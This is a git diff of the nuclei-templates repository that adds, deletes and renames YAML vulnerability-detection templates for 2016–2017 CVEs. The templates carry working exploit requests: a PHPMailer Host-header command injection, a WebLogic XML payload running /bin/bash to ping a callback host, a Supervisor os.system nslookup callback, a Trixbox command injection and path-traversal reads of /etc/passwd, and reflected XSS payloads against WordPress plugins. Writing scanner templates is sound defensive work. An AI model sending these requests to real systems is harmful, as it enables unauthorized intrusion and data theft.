b/nuclei-templates/CVE-2016/CVE-2016-10033.yaml deleted file mode 100644 index c902fc75a9..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-10033.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2016-10033 - -info: - name: WordPress PHPMailer < 5.2.18 - Remote Code Execution - author: princechaddha - severity: critical - description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport. - reference: - - https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html - - https://nvd.nist.gov/vuln/detail/CVE-2016-10033 - - https://www.exploit-db.com/exploits/40970/ - - https://www.exploit-db.com/exploits/40968/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2016-10033 - cwe-id: CWE-77 - tags: cve,cve2016,rce,edb,wordpress - -requests: - - raw: - - |+ - GET /?author=1 HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - - - |+ - POST /wp-login.php?action=lostpassword HTTP/1.1 - Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null) - Accept: */* - Content-Type: application/x-www-form-urlencoded - - wp-submit=Get+New+Password&redirect_to=&user_login={{username}} - - unsafe: true - extractors: - - type: regex - name: username - internal: true - group: 1 - part: body - regex: - - 'Author:(?:[A-Za-z0-9 -\_="]+)?" - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html - -# Enhanced by mp on 2022/08/18 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000131.yaml b/nuclei-templates/CVE-2016/cve-2016-1000131.yaml new file mode 100644 index 0000000000..14269d707f --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000131.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000131 + +info: + name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin e-search v1.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=393 + - https://wordpress.org/plugins/e-search + - http://www.securityfocus.com/bid/93867 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000131 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000133.yaml b/nuclei-templates/CVE-2016/cve-2016-1000133.yaml new file mode 100644 index 0000000000..154c2e4ebc --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000133.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000133 + +info: + name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 + - https://wordpress.org/plugins/forget-about-shortcode-buttons + - http://www.vapidlabs.com/wp/wp_advisory.php?v=602 + - http://www.securityfocus.com/bid/93869 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000133 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000143.yaml b/nuclei-templates/CVE-2016/cve-2016-1000143.yaml new file mode 100644 index 0000000000..37b57b29af --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000143.yaml @@ -0,0 +1,38 @@ +id: CVE-2016-1000143 + +info: + name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin photoxhibit v2.1.8 + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143 + - https://wordpress.org/plugins/photoxhibit + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000143 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000149.yaml b/nuclei-templates/CVE-2016/cve-2016-1000149.yaml new file mode 100644 index 0000000000..f55daff95d --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000149.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000149 + +info: + name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin simpel-reserveren v3.5.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 + - https://wordpress.org/plugins/simpel-reserveren + - http://www.vapidlabs.com/wp/wp_advisory.php?v=474 + - http://www.securityfocus.com/bid/93582 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000149 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000152.yaml b/nuclei-templates/CVE-2016/cve-2016-1000152.yaml new file mode 100644 index 0000000000..897d14916e --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000152.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000152 + +info: + name: Tidio-form <= 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin tidio-form v1.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=799 + - https://wordpress.org/plugins/tidio-form + - http://www.securityfocus.com/bid/93579 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000152 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000154.yaml b/nuclei-templates/CVE-2016/cve-2016-1000154.yaml new file mode 100644 index 0000000000..6080409f32 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000154.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000154 + +info: + name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin whizz v1.0. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=112 + - https://wordpress.org/plugins/whizz + - http://www.securityfocus.com/bid/93538 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000154 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-10033.yaml b/nuclei-templates/CVE-2016/cve-2016-10033.yaml new file mode 100644 index 0000000000..17b510dc45 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-10033.yaml @@ -0,0 +1,56 @@ +id: CVE-2016-10033 + +info: + name: WordPress PHPMailer < 5.2.18 Remote Code Execution + author: princechaddha + severity: critical + description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport. + reference: + - https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html + - https://nvd.nist.gov/vuln/detail/CVE-2016-10033 + - https://www.exploit-db.com/exploits/40970/ + - https://www.exploit-db.com/exploits/40968/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-10033 + cwe-id: CWE-77 + tags: wordpress,cve,cve2016,rce + +requests: + - raw: + - |+ + GET /?author=1 HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + + - |+ + POST /wp-login.php?action=lostpassword HTTP/1.1 + Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null) + Accept: */* + Content-Type: application/x-www-form-urlencoded + + wp-submit=Get+New+Password&redirect_to=&user_login={{username}} + + unsafe: true + extractors: + - type: regex + name: username + internal: true + group: 1 + part: body + regex: + - 'Author:(?:[A-Za-z0-9 -\_="]+)?" + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2017/CVE-2017-1000028.yaml b/nuclei-templates/CVE-2017/CVE-2017-1000028.yaml deleted file mode 100644 index 2402b889a0..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-1000028.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2017-1000028 - -info: - name: Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion - author: pikpikcu,daffainfo - severity: high - description: Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests. - reference: - - https://www.exploit-db.com/exploits/45196 - - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822 - - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 - - https://www.exploit-db.com/exploits/45196/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-1000028 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-1000028 - cwe-id: CWE-22 - tags: cve,cve2017,oracle,glassfish,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - - "{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - dsl: - - "regex('root:.*:0:0:', body)" - - "status_code == 200" - condition: and - - - type: dsl - dsl: - - "contains(body, 'bit app support')" - - "contains(body, 'fonts')" - - "contains(body, 'extensions')" - - "status_code == 200" - condition: and - -# Enhanced by mp on 2022/06/09 diff --git a/nuclei-templates/CVE-2017/CVE-2017-10271.yaml b/nuclei-templates/CVE-2017/CVE-2017-10271.yaml deleted file mode 100644 index 9585ea0af0..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-10271.yaml +++ /dev/null @@ -1,99 +0,0 @@ -id: CVE-2017-10271 - -info: - name: Oracle WebLogic Server - Remote Command Execution - author: dr_set,ImNightmaree,true13 - severity: high - description: | - The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. - reference: - - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - - https://github.com/SuperHacker-liuan/cve-2017-10271-poc - - http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html - - https://nvd.nist.gov/vuln/detail/CVE-2017-10271 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2017-10271 - tags: weblogic,oast,kev,vulhub,cve,cve2017,rce,oracle - -requests: - - raw: - - | - POST /wls-wsat/CoordinatorPortType HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Language: en - Content-Type: text/xml - - - - - - - - - - /bin/bash - - - -c - - - ping -c 1 {{interactsh-url}} - - - - - - - - - - - | - POST /wls-wsat/CoordinatorPortType HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Language: en - Content-Type: text/xml - - - - - - - - - - - - - {{randstr}} - - - - - - - - - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - dsl: - - regex("java.lang.ProcessBuilder || 0", body) - - contains(interactsh_protocol, "dns") - - status_code == 500 - condition: and - - - type: dsl - dsl: - - body == "{{randstr}}" - - status_code == 200 - condition: and - -# Enhanced by mp on 2022/06/09 diff --git a/nuclei-templates/CVE-2017/cve-2017-10974.yaml b/nuclei-templates/CVE-2017/CVE-2017-10974.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-10974.yaml rename to nuclei-templates/CVE-2017/CVE-2017-10974.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-11610.yaml b/nuclei-templates/CVE-2017/CVE-2017-11610.yaml deleted file mode 100644 index ac5a9f54d6..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-11610.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2017-11610 - -info: - name: XML-RPC Server - Remote Code Execution - author: notnotnotveg - severity: high - description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups. - reference: - - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md - - https://nvd.nist.gov/vuln/detail/CVE-2017-11610 - - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ/ - - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2017-11610 - cwe-id: CWE-276 - metadata: - shodan-query: http.title:"Supervisor Status" - tags: oast,xmlrpc,msf,cve,cve2017,rce,supervisor - -requests: - - raw: - - | - POST /RPC2 HTTP/1.1 - Host: {{Hostname}} - Accept: text/xml - Content-type: text/xml - - - supervisor.supervisord.options.warnings.linecache.os.system - - - nslookup {{interactsh-url}} - - - - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - - - type: word - part: header - words: - - "text/xml" - - - type: word - part: body - words: - - "" - - "" - condition: and - -# Enhanced by mp on 2022/06/09 diff --git a/nuclei-templates/CVE-2017/cve-2017-12149.yaml b/nuclei-templates/CVE-2017/CVE-2017-12149.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12149.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12149.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-12544.yaml b/nuclei-templates/CVE-2017/CVE-2017-12544.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12544.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12544.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-12611.yaml b/nuclei-templates/CVE-2017/CVE-2017-12611.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12611.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12611.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-12615.yaml b/nuclei-templates/CVE-2017/CVE-2017-12615.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12615.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12615.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-12629.yaml b/nuclei-templates/CVE-2017/CVE-2017-12629.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12629.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12629.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-12794.yaml b/nuclei-templates/CVE-2017/CVE-2017-12794.yaml deleted file mode 100644 index 4e18ff6124..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-12794.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2017-12794 - -info: - name: Django Debug Page - Cross-Site Scripting - author: pikpikcu - severity: medium - description: | - Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). - reference: - - https://twitter.com/sec715/status/1406779605055270914 - - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 - - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ - - http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-12794 - cwe-id: CWE-79 - tags: xss,django,cve,cve2017 - -requests: - - method: GET - path: - - "{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: status - status: - - 200 - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/CVE-2017-14535.yaml b/nuclei-templates/CVE-2017/CVE-2017-14535.yaml deleted file mode 100644 index 330df119bb..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-14535.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2017-14535 - -info: - name: Trixbox - 2.8.0.4 OS Command Injection - author: pikpikcu - severity: high - description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. - reference: - - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - - https://www.exploit-db.com/exploits/49913 - - https://nvd.nist.gov/vuln/detail/CVE-2017-14535 - - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2017-14535 - cwe-id: CWE-78 - tags: cve,cve2017,trixbox,rce,injection,edb - -requests: - - raw: - - | - GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: de,en-US;q=0.7,en;q=0.3 - Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - Connection: close - Cache-Control: max-age=0 - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/01 diff --git a/nuclei-templates/CVE-2017/cve-2017-14651.yaml b/nuclei-templates/CVE-2017/CVE-2017-14651.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-14651.yaml rename to nuclei-templates/CVE-2017/CVE-2017-14651.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-15287.yaml b/nuclei-templates/CVE-2017/CVE-2017-15287.yaml deleted file mode 100644 index 916b9a90a9..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-15287.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2017-15287 - -info: - name: Dreambox WebControl 2.0.0 - Cross-Site Scripting - author: pikpikcu - severity: medium - description: | - Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI. - reference: - - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf - - https://www.exploit-db.com/exploits/42986/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-15287 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-15287 - cwe-id: CWE-79 - tags: dreambox,edb,cve,cve2017,xss - -requests: - - raw: - - | - GET /webadmin/pkg?command= HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers: - - type: word - words: - - 'Unknown command: ' - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/cve-2017-15363.yaml b/nuclei-templates/CVE-2017/CVE-2017-15363.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-15363.yaml rename to nuclei-templates/CVE-2017/CVE-2017-15363.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-15647.yaml b/nuclei-templates/CVE-2017/CVE-2017-15647.yaml deleted file mode 100644 index d0a33eaa1a..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-15647.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2017-15647 - -info: - name: FiberHome Routers - Local File Inclusion - author: daffainfo - severity: high - description: FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. - reference: - - https://www.exploit-db.com/exploits/44054 - - https://www.cvedetails.com/cve/CVE-2017-15647 - - https://blogs.securiteam.com/index.php/archives/3472 - - https://nvd.nist.gov/vuln/detail/CVE-2017-15647 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-15647 - cwe-id: CWE-22 - tags: cve,cve2017,lfi,router - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/09 diff --git a/nuclei-templates/CVE-2017/cve-2017-16806.yaml b/nuclei-templates/CVE-2017/CVE-2017-16806.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-16806.yaml rename to nuclei-templates/CVE-2017/CVE-2017-16806.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-17451.yaml b/nuclei-templates/CVE-2017/CVE-2017-17451.yaml deleted file mode 100644 index 2cd0371034..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-17451.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2017-17451 - -info: - name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 - tags: cve,cve2017,wordpress,xss,wp-plugin - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2017-17451 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-3528.yaml b/nuclei-templates/CVE-2017/CVE-2017-3528.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-3528.yaml rename to nuclei-templates/CVE-2017/CVE-2017-3528.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-4011.yaml b/nuclei-templates/CVE-2017/CVE-2017-4011.yaml deleted file mode 100644 index 2d27151229..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-4011.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2017-4011 - -info: - name: McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting - author: geeknik - severity: medium - description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request. - reference: - - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab - - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 - - https://nvd.nist.gov/vuln/detail/CVE-2017-4011 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-4011 - cwe-id: CWE-79 - tags: cve,cve2017,mcafee,xss - -requests: - - method: GET - path: - - "{{BaseURL}}" - headers: - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);// - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//" - - - type: word - part: header - words: - - "text/html" - -# Enhanced by mp on 2022/08/12 diff --git a/nuclei-templates/CVE-2017/cve-2017-5638.yaml b/nuclei-templates/CVE-2017/CVE-2017-5638.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-5638.yaml rename to nuclei-templates/CVE-2017/CVE-2017-5638.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-6090.yaml b/nuclei-templates/CVE-2017/CVE-2017-6090.yaml deleted file mode 100644 index 2dc16ebb62..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-6090.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2017-6090 - -info: - name: PhpColl 2.5.1 Arbitrary File Upload - author: pikpikcu - severity: high - description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php. - reference: - - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-6090 - - https://www.exploit-db.com/exploits/42934/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2017-6090 - cwe-id: CWE-434 - metadata: - shodan-query: http.title:"PhpCollab" - tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive - -requests: - - raw: - - | # REQUEST 1 - POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 - Host: {{Hostname}} 